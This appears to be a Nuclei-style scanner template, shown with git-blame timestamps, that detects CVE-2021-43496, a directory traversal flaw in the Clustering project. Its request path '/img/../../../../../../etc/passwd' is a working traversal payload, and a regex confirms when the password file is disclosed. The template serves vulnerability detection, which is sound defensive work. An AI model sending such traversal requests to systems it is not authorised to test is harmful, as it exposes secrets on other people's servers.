2021-12-13 20:52:26 +00:00
id : CVE-2021-43496
info :
2022-02-28 18:39:57 +00:00
name : Clustering Local File Inclusion
2021-12-13 20:52:26 +00:00
author : Evan Rubinstein
severity : high
2022-05-17 09:18:12 +00:00
description : Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
2021-12-13 20:52:26 +00:00
reference :
- https://github.com/varun-suresh/Clustering/issues/12
- https://nvd.nist.gov/vuln/detail/CVE-2021-43496
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2021-12-13 20:52:26 +00:00
cvss-score : 7.5
cve-id : CVE-2021-43496
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:clustering_project:clustering:*:*:*:*:*:*:*:*
epss-score : 0.01272
2021-12-13 20:52:26 +00:00
tags : cve,cve2021,lfi,clustering
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-12-13 20:52:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-13 20:52:26 +00:00
- method : GET
path :
- "{{BaseURL}}/img/../../../../../../etc/passwd"
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
2022-02-28 18:39:57 +00:00
# Enhanced by mp on 2022/02/28